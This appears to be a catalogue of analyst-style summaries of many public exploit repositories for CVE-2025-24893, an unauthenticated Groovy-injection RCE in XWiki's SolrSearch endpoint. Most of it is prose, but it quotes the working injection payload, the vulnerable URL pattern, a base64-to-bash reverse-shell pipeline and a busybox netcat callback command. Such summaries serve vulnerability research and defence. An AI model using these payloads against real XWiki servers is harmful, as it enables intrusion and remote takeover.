Unauthenticated RCE in XWiki SolrSearch

This repository is a small standalone Python exploit for CVE-2025-24893 affecting XWiki. It contains one executable script (`CVE-2025-24-893.py`) and one README. The Python script uses the `requests` library with TLS verification disabled to send a GET request to the XWiki endpoint `/bin/get/Main/SolrSearch`, supplying a malicious `text` parameter that breaks into macro syntax and injects Groovy code. That Groovy code invokes `Runtime.getRuntime().exec()` with `/bin/bash -c 'echo <base64> | base64 -d | bash'`, where the decoded command is a Bash reverse shell to an attacker-controlled IP and port. The script dynamically generates the reverse-shell command from CLI arguments, base64-encodes it, and treats an HTTP timeout as a likely indicator that the shell is active. The exploit is operational rather than a mere PoC because it delivers a working payload, but it is not highly modular or framework-based. The README documents the target vulnerability, affected XWiki versions, usage with a Netcat listener, dependency installation, and patched versions. Overall, the repository’s purpose is unauthenticated web-based RCE exploitation of vulnerable XWiki instances to obtain a reverse shell.

This repository is a small standalone Python exploit for CVE-2025-24893 targeting XWiki. It contains two files: a README with vulnerability description, usage examples, and references; and exploit.py, the only code file and clear entry point. The exploit is not part of a larger framework. The exploit targets the XWiki SolrSearch endpoint at /xwiki/bin/get/Main/SolrSearch by sending a GET request with media=rss and a malicious text parameter. The payload breaks out of the expected template context and injects a Groovy block: }}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}. This causes the remote server to execute arbitrary OS commands and print their stdout into the RSS response. Core capabilities include: building the SSTI/Groovy payload, sending the exploit request over HTTP or HTTPS to a user-specified host and port, extracting reflected command output from the XML/RSS response using regex and HTML entity cleanup, executing a single command, and providing an interactive pseudo-shell loop for repeated remote command execution. The script uses argparse for CLI handling, requests for HTTP communication, regex-based parsing for output extraction, and termcolor/readline for usability. Fingerprintable targets/endpoints are limited and straightforward: the vulnerable XWiki path /xwiki/bin/get/Main/SolrSearch and the full constructed target URLs using either http or https. No hardcoded IPs, domains, C2 infrastructure, persistence paths, or registry keys are present. Overall, this is an operational unauthenticated web RCE exploit with a basic but functional command-execution payload and interactive operator workflow.

Repository contains a single Python exploit script (CVE-2025-24893.py), plus README and MIT LICENSE. Core capability: unauthenticated remote code execution against vulnerable XWiki instances by injecting a Groovy payload into the SolrSearch request. The script builds a URL of the form: <target>/xwiki/bin/get/Main/SolrSearch?media=rss&text=<urlencoded_payload> where the payload closes template context and invokes Groovy to run an attacker-supplied system command using "<command>".execute(). It then issues a single HTTP GET request (requests.get) with TLS verification disabled (verify=False) and a 15s timeout; it does not parse output, so it is effectively a blind command execution trigger. Notable implementation details: - CLI arguments: -t/--target (base URL) and -c/--command (command to execute). - Uses urllib.parse.quote to URL-encode the Groovy injection string. - No authentication/session handling; assumes endpoint is reachable. - The check_url() helper exists but is never used, and its protocol check logic is incorrect (uses 'or' instead of 'and'), but this does not affect exploitation because exploit() uses the raw target argument. Overall purpose: a small operational PoC/one-shot exploit to trigger RCE on XWiki via the SolrSearch macro injection described as CVE-2025-24893.

Repository contains a minimal proof-of-concept for CVE-2025-24893 targeting XWiki. Structure: (1) README.md: brief French description indicating an RCE PoC for XWiki. (2) simple_target_poc.py: Python script that takes a target base URL, forces https:// if no scheme is provided, and sends a single GET request to `/xwiki/bin/get/Main/SolrSearch` with `media=rss&text=<payload>`. The payload is a crafted XWiki template snippet that invokes a Groovy block to execute the OS command `id` (`"id".execute().text`) and prints markers `START_RES`/`END_RES`. The script disables TLS certificate verification, uses a 12-second timeout, checks for HTTP 200 and presence of `START_RES`, then regex-extracts and prints the command output (stripping `<br/>`). Overall purpose: confirm remote code execution by running `id` and displaying the result; no post-exploitation features (shell, persistence, lateral movement) are included.

This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki versions prior to 15.10.9. The exploit is implemented in a single Python script (pwn.py) that crafts a Groovy script injection payload, which is delivered via a GET request to the vulnerable SolrSearch RSS feed endpoint. The payload is a base64-encoded bash reverse shell, which is decoded and executed on the target, resulting in a shell connection back to the attacker's machine. The repository is minimal, containing only a license, a README with detailed usage instructions, and the exploit script. The exploit requires only the 'requests' Python library and is straightforward to use, making it operational and effective for penetration testing or red teaming against vulnerable XWiki instances.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform's SolrSearch macro. The exploit targets XWiki versions 5.3-milestone2 through 15.10.10 and 16.0.0-RC1 through 16.4.0, where improper sanitization allows attackers to inject Groovy code via crafted HTTP GET requests to the /bin/get/Main/SolrSearch endpoint. The main file, CVE-2025-24893.py, provides both detection and exploitation capabilities: it can check if a target is vulnerable and, if so, execute arbitrary system commands either as a one-liner or interactively. The payload leverages Groovy template injection to invoke java.lang.Runtime.exec, enabling full command execution on the server. The README.md provides detailed technical background, affected versions, exploitation steps, and mitigation advice. No hardcoded IPs or external C2 endpoints are present; the exploit is generic and targets the specified XWiki endpoint. The repository is well-structured, with clear separation between exploit code and documentation, and is intended for authorized security testing and research.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki (up to version 15.10.10). The exploit leverages a server-side template injection flaw in the SolrSearch endpoint, allowing attacker-supplied input to be evaluated as Groovy code. The repository consists of a detailed README.md explaining the vulnerability, affected versions, and usage instructions, and a single exploit script (xwiki_cve_2025_24893.py). The script supports three modes: vulnerability check (benign code execution), reverse shell (connects back to the attacker's machine), and bind shell (opens a shell on the target for the attacker to connect to). The exploit works by sending crafted HTTP GET requests to the /xwiki/bin/get/Main/SolrSearch or /xwiki/bin/view/Main/SolrSearch endpoints, injecting Groovy code via the 'text' parameter. The payloads are base64-encoded bash commands executed on the target. No authentication is required, making this a high-impact exploit for unpatched, internet-facing XWiki instances.

This repository contains a Python exploit script (CVE-2025-24893.py) and a README.md. The exploit targets a remote code execution vulnerability in XWiki versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The script takes a target URL and a system command as arguments, then crafts a Groovy code injection payload and sends it to the vulnerable endpoint '/xwiki/bin/get/Main/SolrSearch?media=rss&text=' on the target XWiki instance. If successful, the specified command is executed on the server. The exploit is operational, allowing arbitrary command execution, and is intended for use against network-accessible XWiki servers. The README provides usage instructions and context about the vulnerability.

This repository contains a single Python script, 'exploit.py', which targets a Groovy code injection vulnerability in the XWiki platform's SolrSearch endpoint. The script takes a target host (IP, domain, or host:port) as an argument and attempts to verify if the endpoint is vulnerable by injecting a Groovy payload that executes a harmless command. If the target is vulnerable, the script provides an interactive shell-like interface, allowing the user to input arbitrary system commands, which are then executed on the target server via Groovy code injection. The results of the commands are displayed to the user. The exploit leverages HTTP GET requests to the '/xwiki/bin/get/Main/SolrSearch' endpoint with a specially crafted 'text' parameter. The script is operational and provides real command execution capabilities if the target is vulnerable. No hardcoded CVE is referenced, but the exploit is clearly aimed at XWiki instances with an exposed and vulnerable SolrSearch endpoint.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform's SolrSearch macro. The exploit leverages unsafe Groovy template evaluation, allowing attackers to execute arbitrary system commands on the server without authentication. The main file, 'CVE-2025-24893.py', provides both detection and exploitation capabilities: it can check if a target is vulnerable and, if so, execute arbitrary commands either as a one-liner or interactively. The script targets the '/bin/get/Main/SolrSearch' HTTP endpoint, injecting malicious Groovy code via the 'search' parameter. The README.md provides detailed background, affected versions (XWiki 5.3-milestone2 through 15.10.10 and 16.0.0-RC1 through 16.4.0), exploitation details, and mitigation advice. The exploit is operational, providing real command execution on vulnerable targets, and is not part of a larger framework. No hardcoded IPs or external domains are present; the script is designed for flexible targeting via user-supplied URLs.

This repository contains a Bash exploit script (CVE-2025-24893) and a detailed README. The exploit targets a critical unauthenticated remote code execution (RCE) vulnerability in XWiki Platform (CVE-2025-24893), specifically in the SolrSearch macro's handling of Groovy expressions. The script takes a target URL and a system command as arguments, constructs a Groovy payload to execute the command, URL-encodes it, and sends it to the vulnerable SolrSearch endpoint via an HTTP GET request. The attack does not require authentication or CSRF tokens and works against default configurations of affected XWiki versions. The README provides comprehensive background, usage instructions, affected versions, mitigation advice, and real-world exploitation context. The exploit is operational, allowing arbitrary command execution on the target server, and is being actively exploited in the wild. The main fingerprintable endpoint is '/xwiki/bin/get/Main/SolrSearch?media=rss&text=', which is used for the injection. The repository is well-structured, with clear separation between exploit code and documentation.

This repository contains a working proof-of-concept exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki (versions prior to 15.10.11, 16.4.1, and 16.5.0RC1). The exploit is implemented in Python (xwiki_groovy_rce.py) and is accompanied by a README.md with usage instructions and vulnerability details. The exploit works by sending a specially crafted Groovy payload to the SolrSearch macro endpoint of a vulnerable XWiki instance, resulting in execution of a bash reverse shell command. The script can automatically start a listener on the attacker's machine to catch the reverse shell or use an existing one. The main fingerprintable endpoints are the XWiki SolrSearch HTTP endpoint and the attacker's TCP listener for the reverse shell. The exploit is operational, providing a real reverse shell if the target is vulnerable and accessible.

This repository contains a Python exploit script (xwiki_exploit.py) and a README.md for CVE-2025-24893, a remote code execution vulnerability in XWiki up to version 15.10.10. The exploit works by injecting a Groovy template payload via a crafted HTTP GET request to the XWiki SolrSearch endpoint. The payload is a base64-encoded bash reverse shell command, which is decoded and executed on the target server, resulting in a reverse shell connection to the attacker's machine. The script requires the attacker to provide the target's base URL, their own IP (lhost), and a listening port (lport). The README provides detailed usage instructions, listener setup, and background on the vulnerability. The exploit is operational, providing a working reverse shell if the target is vulnerable and the attacker's listener is set up correctly. The main attack vector is network-based, targeting the XWiki web application via HTTP. The repository is well-structured, with clear separation between documentation and exploit code.

This repository contains a Python exploit script (CVE-2025-24893.py) and a README for exploiting a remote code execution (RCE) vulnerability in XWiki (CVE-2025-24893). The exploit targets the SolrSearch endpoint of XWiki, injecting a specially crafted payload that leverages Groovy code execution to run arbitrary system commands. The script takes a target URL and a command as arguments, constructs the malicious request, and sends it to the vulnerable endpoint. The README provides an example for spawning a reverse shell and tips for upgrading the shell. The exploit is operational, allowing attackers to execute arbitrary commands or gain shell access on the target XWiki server. The main attack vector is network-based, requiring access to the XWiki web interface.

This repository provides a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform. The exploit is implemented in a single Python script (CVE-2025-24893.py) that crafts a malicious HTTP GET request to the vulnerable SolrSearch endpoint of a target XWiki instance. The payload leverages Groovy code injection to execute arbitrary system commands on the server, with the output returned in the HTTP response. The script is operational and allows the attacker to specify both the target URL and the command to execute. The README.md provides detailed background, usage instructions, affected versions, and mitigation steps. The main fingerprintable endpoint is the '/xwiki/bin/get/Main/SolrSearch' path, which is exploited via the 'text' parameter. The exploit does not require authentication and is effective against a wide range of XWiki versions prior to the patched releases. The repository is well-structured, with clear separation between exploit code and documentation.

This repository contains a functional proof-of-concept exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki. The main file, 'CVE-2025-24893-reverse-shell.py', is a Python script that targets the SolrSearch endpoint of a vulnerable XWiki instance. It injects a Groovy macro payload via a crafted HTTP GET request, exploiting improper input sanitization to execute arbitrary commands on the server. The default payload opens a reverse shell to the attacker's specified IP and port using 'busybox nc'. The repository includes a README with usage instructions and a .gitattributes file for text normalization. The exploit requires the attacker to provide the target URL, their own IP, and a listening port. The attack vector is network-based, and the main fingerprintable endpoint is the '/xwiki/bin/get/Main/SolrSearch' path. The exploit is operational, providing a working reverse shell if the target is vulnerable.

This repository contains a proof-of-concept exploit for CVE-2025-24893, targeting the XWiki SolrSearch template injection vulnerability. The main exploit script, 'xwiki_solr_rce.py', is a Python 3 tool that allows an attacker to execute arbitrary commands or launch a reverse shell on a vulnerable XWiki instance without authentication. The exploit works by sending a specially crafted Groovy payload to the '/xwiki/bin/get/Main/SolrSearch' endpoint via the 'text' parameter, leveraging template injection to achieve code execution. The script supports two main modes: executing a single command (with output returned in Base64 for reliable parsing) and launching a reverse shell to an attacker-controlled host and port. The README provides clear usage instructions and notes that the exploit was tested against XWiki Debian 15.10.8, with the issue patched in later versions. The repository is structured with a single Python exploit script, a README with detailed instructions, and a license file. No hardcoded target endpoints are present; the user supplies the target URL and, for reverse shell, the attacker's IP and port.

This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in XWiki. The exploit is implemented in a single Python script (CVE-2025-24893.py) that takes a target URL and a system command as arguments. It crafts a malicious Groovy payload and injects it into the 'text' parameter of the '/xwiki/bin/get/Main/SolrSearch' endpoint, exploiting improper evaluation of Groovy expressions in the SolrSearch macro. The script uses the requests library to send the payload and trigger command execution on the vulnerable server. The README provides detailed vulnerability information, affected and patched versions, and usage instructions. The exploit is operational, allowing arbitrary command execution on unpatched XWiki instances accessible over HTTP/S.

This repository contains a Python exploit script (CVE-2025-24893.py) targeting a Groovy code injection vulnerability in XWiki (CVE-2025-24893). The exploit interacts with the vulnerable SolrSearch endpoint on the domain wiki.editor.htb, injecting Groovy code via the 'text' parameter to execute arbitrary system commands on the server. The script encodes user-supplied commands, crafts a Groovy payload, and sends it to the target endpoint, then parses and displays the command output. The repository includes a license file and a brief README in Chinese stating the tool is for vulnerability remediation assistance only. The main exploit file is self-contained, requires the target to be accessible over HTTP, and provides interactive command execution capabilities.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki. The exploit consists of a single Python script (CVE-2025-24893.py) and a README.md file. The script allows an attacker to check if a target XWiki instance is vulnerable and, if so, execute arbitrary system commands remotely without authentication. It does this by injecting Groovy code into the SolrSearch macro via a crafted HTTP GET request. The script provides command-line options to specify the target URL, the command to execute, and a verification mode to check for vulnerability. The README.md provides usage instructions, affected versions, and references. The main endpoints targeted are '/xwiki/bin/view/Main/' for version checking and '/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' for exploitation. The exploit is operational and demonstrates real RCE capability against vulnerable XWiki instances.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, targeting XWiki instances vulnerable to remote Groovy code execution via the SolrSearch endpoint. The main file, 'CVE-2025-24893.py', is a command-line tool that takes a base URL as input and allows the user to interactively send arbitrary system commands to the target server. The exploit works by injecting a specially crafted Groovy payload into the 'text' parameter of the '/xwiki/bin/get/Main/SolrSearch' endpoint, causing the server to execute the command and return its output. The script parses the response to extract and display the command output to the user. The repository also includes a README with basic usage instructions and a LICENSE file. No hardcoded IPs or domains are present; the user supplies the target URL. The exploit is operational, providing real command execution on vulnerable targets.

This repository provides a proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in XWiki version 15.10.10. The exploit is implemented in a single Python script (CVE-2025-24893.py), which takes a target URL and a command to execute as arguments. It crafts a malicious HTTP GET request to the SolrSearch macro endpoint, injecting Groovy code that executes arbitrary system commands on the server. The script parses and displays the command output if the exploit is successful. The README.md provides background, usage instructions, and references. The repository is structured simply, with the main exploit script, a README, and a license file. The exploit targets the network-exposed SolrSearch macro endpoint and does not require authentication, making it highly impactful if the target is vulnerable.

This repository contains a proof-of-concept (POC) exploit for CVE-2024-24893, an unauthenticated remote code execution (RCE) vulnerability in XWiki Platform. The exploit is implemented in a single Python script (CVE-2025-24893.py) that targets the /xwiki/bin/get/Main/SolrSearch endpoint. By injecting Groovy code via the 'text' parameter, the script enables execution of arbitrary system commands on the vulnerable XWiki server, with the output returned in the RSS feed's title. The exploit does not require authentication and is effective against XWiki versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The README.md provides a detailed description of the vulnerability, exploitation steps, and mitigation advice. The repository is structured simply, with one exploit script and a README, and is intended for security testing and demonstration of the vulnerability.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki Platform versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The exploit is implemented in a single Python script ('exploit.py'), which interacts with a target XWiki instance over HTTP or HTTPS. The script prompts the user for the target's base URL, constructs a Groovy code injection payload using the 'text' parameter of the '/bin/get/Main/SolrSearch' endpoint, and sends it to the server. The payload executes arbitrary system commands on the server and returns their output, allowing the user to verify the RCE condition. The PoC is intentionally non-destructive and does not include weaponized payloads (e.g., reverse shells), focusing instead on safe demonstration commands. The repository also includes a README with usage instructions and a LICENSE file. The main attack vector is network-based, targeting a specific HTTP endpoint on the vulnerable XWiki server.

This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform. The main exploit script, 'CVE-2025-24893.py', is written in Python and is the only code file in the repository. It allows an attacker to target a vulnerable XWiki instance by sending a specially crafted request to the '/bin/get/Main/SolrSearch' endpoint, injecting Groovy code that executes arbitrary system commands. By default, the exploit attempts to read '/etc/shadow' to demonstrate successful code execution. The script supports both single-target and multi-target (from a file) modes, automatically detects HTTP/HTTPS, and provides colored terminal output for clarity. The README provides usage instructions, impact details, and mitigation advice. No framework is used; the exploit is standalone and operational, with a hardcoded payload. The attack vector is network-based, requiring only access to the vulnerable web interface. The repository is well-structured, with clear documentation and a single, focused exploit script.

This repository provides a proof-of-concept exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki via the SolrSearch endpoint. The main exploit script, 'CVE-2025-24893.ts', is written in TypeScript and designed to be run with the Bun JavaScript runtime. It allows an attacker to execute arbitrary system commands or open a reverse shell on a vulnerable XWiki server by injecting Groovy code through a crafted HTTP GET request to the '/xwiki/bin/get/Main/SolrSearch' endpoint. The script supports command-line arguments for specifying the target URL, command to execute, or reverse shell parameters (attacker's IP and port). The exploit constructs a payload that leverages Groovy's 'execute()' method to run system commands on the server. The repository includes supporting files for user interface enhancements (fancy/fancier.ts), dependency management (package.json, bun.lock), and configuration (tsconfig.json). The README provides clear usage instructions. No hardcoded IPs or domains are present; the attacker supplies these at runtime. The exploit is operational, providing real RCE capabilities, but is not part of a larger exploitation framework.

This repository contains a Bash proof-of-concept exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in the XWiki Platform. The exploit is implemented in a single Bash script (cve.sh) that takes three arguments: the target XWiki URL, the attacker's listener IP, and the port. The script crafts a malicious Groovy payload and sends it to the vulnerable XWiki endpoint (/xwiki/bin/get/Main/SolrSearch) using curl. The payload executes a Python reverse shell, connecting back to the attacker's machine. The README provides usage instructions and affected version ranges. The exploit is operational and provides a working reverse shell if the target is vulnerable and accessible.

This repository provides a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki (≤ 15.10.10, ≤ 14.10.16, and all unmaintained 13.x/12.x). The exploit leverages improper input handling in the SolrSearch macro, allowing attackers to inject Groovy code via the 'text' parameter in an HTTP GET request to '/xwiki/bin/get/Main/SolrSearch'. The provided Python script (CVE-2025-24893.py) automates the attack, supporting both reverse shell and arbitrary command execution. The script constructs a Groovy payload (optionally base64-encoded for reverse shells), URL-encodes it, and sends it to the vulnerable endpoint. The README.md offers detailed technical background, manual exploitation steps, affected version matrix, and mitigation advice. The exploit is operational and does not require authentication, making it highly dangerous for exposed XWiki instances.

This repository is a Proof of Concept (PoC) exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki's SolrSearch endpoint. The repository contains four files: a LICENSE, a detailed README.md, the main exploit script (exploit.py), and a sample payload script (exploit.sh). The exploit.py script is the core of the PoC and is written in Python. It takes as arguments the target XWiki instance URL, the attacker's server address, and the filename of the malicious script to execute. The script crafts a Groovy payload that is injected into the SolrSearch endpoint, causing the target to execute a bash command that fetches and runs a shell script from the attacker's server. The output of the command is extracted from the HTTP response, cleaned of HTML tags/entities, and displayed to the user. The exploit demonstrates the ability to achieve arbitrary code execution on vulnerable XWiki instances. The repository is structured for ease of use and testing, with clear instructions and a sample payload. No hardcoded endpoints are present; all network targets are user-supplied at runtime.

This repository is a Rust-based proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki. The exploit targets the '/xwiki/bin/get/Main/SolrSearch?media=rss' endpoint, abusing a Groovy template injection flaw to execute arbitrary commands on the server. The main exploit logic is contained in 'src/main.rs', which constructs a Groovy payload that executes a base64-encoded bash reverse shell command. The exploit is configurable via command-line arguments for the target URL, listener IP, and port. The README provides clear usage instructions and details about affected and fixed XWiki versions. The exploit is a functional PoC and does not include advanced features such as payload customization beyond the reverse shell. No hardcoded IPs or domains are present; all targeting is user-supplied. The repository is well-structured, with a single Rust source file implementing the exploit logic.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki Platform version 15.10.10. The exploit leverages a Groovy code injection vulnerability in the /xwiki/bin/view/Main/SolrSearch endpoint, accessible without authentication. The main file, CVE-2025-24893.py, accepts a target URL and a command to execute, crafts a malicious payload using Groovy code, and sends it as a URL-encoded parameter in an HTTP GET request. If successful, the server executes the supplied command and returns the output. The repository also includes a README.md with usage instructions and an example. No hardcoded endpoints or credentials are present; the exploit is generic and requires the user to supply the target URL and desired command.

This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in XWiki. The exploit is implemented in a single Python script (CVE-2025-24893-dbs.py) and is accompanied by a detailed README.md explaining the vulnerability, affected versions, and usage instructions. The exploit works by crafting a malicious Groovy payload that is injected into the 'text' parameter of the /xwiki/bin/get/Main/SolrSearch endpoint. The payload is base64-encoded and, when processed by the vulnerable XWiki instance, results in the execution of a bash reverse shell command. The script prompts the user for the target URL, attacker's IP, and port, then constructs the exploit URL and sends it using curl. If successful, the attacker receives a reverse shell connection from the target server. The repository is well-structured, with clear separation between the exploit code and documentation. The exploit is operational and provides a real reverse shell payload, making it suitable for practical exploitation of vulnerable XWiki instances.

This repository contains a Python exploit script (CVE-2025-24893.py) targeting a remote code execution vulnerability in XWiki versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The exploit works by sending a crafted HTTP GET request to the /xwiki/bin/get/Main/SolrSearch endpoint, injecting a Groovy payload via the 'text' parameter. The payload executes arbitrary system commands on the target server. The script takes two arguments: the target URL and the command to execute. The README provides usage instructions and clarifies the affected XWiki versions. The exploit is operational, allowing attackers to run arbitrary commands remotely if the target is vulnerable and accessible.

This repository contains a Python exploit script (exploit.py) targeting CVE-2025-24893, a remote code execution vulnerability in the XWiki Platform. The exploit works by sending a specially crafted Groovy macro payload to the vulnerable XWiki endpoint (/xwiki/bin/get/Main/SolrSearch) via HTTP or HTTPS, depending on which protocol is supported by the target. The payload, when executed by the XWiki server, launches a Python-based reverse shell that connects back to the attacker's machine (LHOST:LPORT), granting remote command execution. The script automatically detects the correct protocol, constructs and URL-encodes the payload, and provides feedback on delivery status. The repository includes a README with detailed usage instructions and a LICENSE file. The main exploit logic resides in exploit.py, which is the only code file present.

This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki's Groovy macro when used with asynchronous rendering. The main script, 'CVE-2025-24893-PoC.py', provides an interactive terminal interface allowing the user to execute arbitrary shell commands on a vulnerable XWiki instance or deploy a reverse shell for persistent access. The exploit works by injecting Groovy expressions into the 'text' parameter of the SolrSearch RSS endpoint, causing the server to execute attacker-supplied commands. The script can also generate a reverse shell ELF payload using msfvenom, host it via a local HTTP server, and automate its download and execution on the target. The repository includes a README with detailed usage instructions, requirements, and workflow. The exploit is operational, providing both single-command execution and reverse shell capabilities, and is configurable for different target and attacker network settings.

This repository contains a proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki. The main file, 'CVE-2025-24893-PoC.py', is a Python script that crafts a malicious Groovy payload and delivers it to the vulnerable XWiki endpoint via an HTTP GET request. The payload enables arbitrary command execution on the target server, including the ability to establish a reverse shell. The script takes the target URL and the desired command as arguments, encodes the payload, and sends it to the '/bin/get/Main/SolrSearch' endpoint. The README provides detailed usage instructions, including how to obtain a reverse shell using base64 encoding. The exploit is network-based, requires no authentication, and targets XWiki installations vulnerable to CVE-2025-24893. The repository is structured simply, with one Python exploit script and a README file.

This repository contains a Python exploit for CVE-2025-24893, a remote code execution vulnerability in the XWiki Platform. The main file, CVE-2025-24893.py, is a self-contained exploit script that leverages a Groovy template injection vulnerability in the SolrSearch component of XWiki. The exploit works by sending a specially crafted HTTP request to the vulnerable endpoint, which executes arbitrary commands on the server. The default payload establishes a reverse shell from the target to the attacker's machine using 'busybox nc <callback_ip> <callback_port> -e /bin/sh'. The script includes features such as automatic protocol detection (HTTP/HTTPS), a test mode to verify exploitability, an integrated reverse shell listener using pwntools, and automatic reconnection if the shell drops. The README.md provides detailed usage instructions, requirements, and troubleshooting tips. The exploit is operational and provides an interactive shell upon successful exploitation. The only code file is CVE-2025-24893.py, which serves as the entry point for the exploit.

This repository contains a Python proof-of-concept exploit (poc.py) targeting XWiki instances vulnerable to Server-Side Template Injection (SSTI) via the SolrSearch endpoint. The exploit first tests if the target is vulnerable by injecting a Groovy payload and checking for a known string in the response. If the target is confirmed vulnerable, it provides an interactive shell interface, allowing the attacker to execute arbitrary system commands on the server by injecting Groovy code through the 'text' parameter of the SolrSearch endpoint. The exploit communicates with the target over HTTP, constructs payloads dynamically, and parses the RSS/XML response to extract command output. The repository also includes a README.md with usage instructions and a requirements.txt listing Python dependencies (requests, beautifulsoup4). No hardcoded IPs or domains are present; the target URL is supplied by the user at runtime. The exploit is operational and provides real command execution capabilities if the target is vulnerable.

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki Platform. The main file, 'CVE-2025-24893-EXP.py', is a Python script that takes a target URL and a system command as arguments. It crafts a malicious Groovy payload, URL-encodes it, and sends it to the vulnerable XWiki endpoint '/bin/get/Main/SolrSearch?media=rss&text=<payload>' via an HTTP GET request. If the target is vulnerable, the server executes the supplied command and returns the output, which the script extracts and displays. The exploit does not require authentication and targets specific vulnerable versions of XWiki as described in the README. The repository is structured simply, with one exploit script and a README providing usage instructions and affected version details. No hardcoded IPs or domains are present; the target URL is supplied by the user at runtime.

This repository contains a Python exploit script (CVE-2025-24893.py) targeting a remote code execution (RCE) vulnerability in XWiki (CVE-2025-24893). The exploit works by sending a specially crafted HTTP GET request to the '/xwiki/bin/get/Main/SolrSearch' endpoint with a malicious Groovy payload embedded in the 'text' parameter. The script takes two arguments: the target XWiki base URL and the Groovy command to execute. It checks for successful exploitation by searching for the string 'EXPLOIT_SUCCESS' in the response. The repository also includes a README.md with usage instructions and a legal disclaimer. The exploit is operational, allowing arbitrary Groovy code execution on vulnerable XWiki instances accessible over the network.